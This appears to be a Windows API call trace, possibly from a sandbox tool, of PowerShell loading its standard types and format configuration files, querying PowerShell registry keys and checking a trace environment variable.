	[0739.408] ReadFile (in: hFile=0x318, lpBuffer=0x2bdcaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2bdcaa0*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0739.408] ReadFile (in: hFile=0x318, lpBuffer=0x2bdcaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2bdcaa0*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0739.409] ReadFile (in: hFile=0x318, lpBuffer=0x2bdcaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2bdcaa0*, lpNumberOfBytesRead=0x24d6c8*=0xcf3, lpOverlapped=0x0) returned 1
	[0739.409] ReadFile (in: hFile=0x318, lpBuffer=0x2bdbefb, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2bdbefb*, lpNumberOfBytesRead=0x24d6c8*=0x0, lpOverlapped=0x0) returned 1
	[0739.409] ReadFile (in: hFile=0x318, lpBuffer=0x2bdcaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2bdcaa0*, lpNumberOfBytesRead=0x24d6c8*=0x0, lpOverlapped=0x0) returned 1
	[0739.411] CloseHandle (hObject=0x318) returned 1
	[0739.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0739.414] SetErrorMode (uMode=0x1) returned 0x1
	[0739.414] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d640 | out: lpFileInformation=0x24d640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0739.414] SetErrorMode (uMode=0x1) returned 0x1
	[0739.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0739.416] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d728 | out: phkResult=0x24d728*=0x318) returned 0x0
	[0739.416] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d6ac, lpData=0x0, lpcbData=0x24d6a8*=0x0 | out: lpType=0x24d6ac*=0x1, lpData=0x0, lpcbData=0x24d6a8*=0x56) returned 0x0
	[0739.416] CoTaskMemAlloc (cb=0x5a) returned 0x1b8e1dc0
	[0739.416] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d67c, lpData=0x1b8e1dc0, lpcbData=0x24d678*=0x56 | out: lpType=0x24d67c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d678*=0x56) returned 0x0
	[0739.416] CoTaskMemFree (pv=0x1b8e1dc0) 
	[0739.416] RegCloseKey (hKey=0x318) returned 0x0
	[0739.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0739.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0740.758] VirtualQuery (in: lpAddress=0x24c410, lpBuffer=0x24d2d0, dwLength=0x30 | out: lpBuffer=0x24d2d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0740.768] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0740.768] GetFileType (hFile=0x318) returned 0x1
	[0740.768] SetErrorMode (uMode=0x1) returned 0x1
	[0740.769] GetFileType (hFile=0x318) returned 0x1
	[0740.769] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0740.770] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0740.770] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0740.771] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0740.771] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.317] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.317] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.317] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.317] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.319] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.319] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.319] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.320] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.320] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.320] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.321] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.321] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.324] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.324] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.324] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.325] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.325] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.326] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.326] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.326] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.327] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.327] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.327] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.327] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.328] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.328] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.328] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.328] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.333] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.333] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.334] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.334] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.334] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.335] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.335] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.335] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.335] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x1b4, lpOverlapped=0x0) returned 1
	[0742.336] ReadFile (in: hFile=0x318, lpBuffer=0x2c43c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2c43c60*, lpNumberOfBytesRead=0x24d6c8*=0x0, lpOverlapped=0x0) returned 1
	[0742.336] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d728 | out: phkResult=0x24d728*=0x318) returned 0x0
	[0742.336] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d6ac, lpData=0x0, lpcbData=0x24d6a8*=0x0 | out: lpType=0x24d6ac*=0x1, lpData=0x0, lpcbData=0x24d6a8*=0x56) returned 0x0
	[0742.336] CoTaskMemAlloc (cb=0x5a) returned 0x1b8e24c0
	[0742.336] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d67c, lpData=0x1b8e24c0, lpcbData=0x24d678*=0x56 | out: lpType=0x24d67c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d678*=0x56) returned 0x0
	[0742.336] CoTaskMemFree (pv=0x1b8e24c0) 
	[0742.337] RegCloseKey (hKey=0x318) returned 0x0
	[0742.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0742.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0749.176] VirtualQuery (in: lpAddress=0x24c410, lpBuffer=0x24d2d0, dwLength=0x30 | out: lpBuffer=0x24d2d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0754.385] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0754.385] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0754.385] CoTaskMemFree (pv=0x51cf00) 
	[0755.549] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d8c8 | out: phkResult=0x24d8c8*=0x2f0) returned 0x0
	[0755.549] RegQueryValueExW (in: hKey=0x2f0, lpValueName="path", lpReserved=0x0, lpType=0x24d8dc, lpData=0x0, lpcbData=0x24d8d8*=0x0 | out: lpType=0x24d8dc*=0x1, lpData=0x0, lpcbData=0x24d8d8*=0x74) returned 0x0
	[0755.549] RegQueryValueExW (in: hKey=0x2f0, lpValueName="path", lpReserved=0x0, lpType=0x24d84c, lpData=0x0, lpcbData=0x24d848*=0x0 | out: lpType=0x24d84c*=0x1, lpData=0x0, lpcbData=0x24d848*=0x74) returned 0x0
	[0755.549] CoTaskMemAlloc (cb=0x78) returned 0x4c0240
	[0755.549] RegQueryValueExW (in: hKey=0x2f0, lpValueName="path", lpReserved=0x0, lpType=0x24d81c, lpData=0x4c0240, lpcbData=0x24d818*=0x74 | out: lpType=0x24d81c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x24d818*=0x74) returned 0x0
	[0755.549] CoTaskMemFree (pv=0x4c0240) 
	[0755.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x24d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0755.549] SetErrorMode (uMode=0x1) returned 0x1
	[0755.549] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x24d7a0 | out: lpFileInformation=0x24d7a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0755.549] SetErrorMode (uMode=0x1) returned 0x1
	[0755.550] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0755.550] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0755.550] CoTaskMemFree (pv=0x51cf00) 
	[0755.552] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0755.552] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0755.552] CoTaskMemFree (pv=0x51cf00) 
	[0755.553] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0755.553] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0755.553] CoTaskMemFree (pv=0x51cf00) 
	[0755.553] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0755.553] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0755.553] CoTaskMemFree (pv=0x51cf00) 
	[0755.554] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0755.554] GetFileType (hFile=0x314) returned 0x1
	[0755.554] SetErrorMode (uMode=0x1) returned 0x1
	[0755.554] GetFileType (hFile=0x314) returned 0x1
	[0755.554] ReadFile (in: hFile=0x314, lpBuffer=0x31fcf48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x31fcf48*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0755.555] ReadFile (in: hFile=0x314, lpBuffer=0x31fcf48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x31fcf48*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0755.556] ReadFile (in: hFile=0x314, lpBuffer=0x31fcf48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x31fcf48*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0755.556] ReadFile (in: hFile=0x314, lpBuffer=0x31fcf48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x31fcf48*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0755.557] ReadFile (in: hFile=0x314, lpBuffer=0x31fcf48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x31fcf48*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0755.557] ReadFile (in: hFile=0x314, lpBuffer=0x31fcf48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x31fcf48*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0755.557] ReadFile (in: hFile=0x314, lpBuffer=0x31fcf48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x31fcf48*, lpNumberOfBytesRead=0x24d438*=0x9e2, lpOverlapped=0x0) returned 1
	[0755.558] ReadFile (in: hFile=0x314, lpBuffer=0x31fc492, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x31fc492*, lpNumberOfBytesRead=0x24d438*=0x0, lpOverlapped=0x0) returned 1
	[0755.558] ReadFile (in: hFile=0x314, lpBuffer=0x31fcf48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x31fcf48*, lpNumberOfBytesRead=0x24d438*=0x0, lpOverlapped=0x0) returned 1
	[0755.558] CloseHandle (hObject=0x314) returned 1
	[0755.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0755.558] SetErrorMode (uMode=0x1) returned 0x1
	[0755.558] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d3e0 | out: lpFileInformation=0x24d3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0755.558] SetErrorMode (uMode=0x1) returned 0x1
	[0755.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
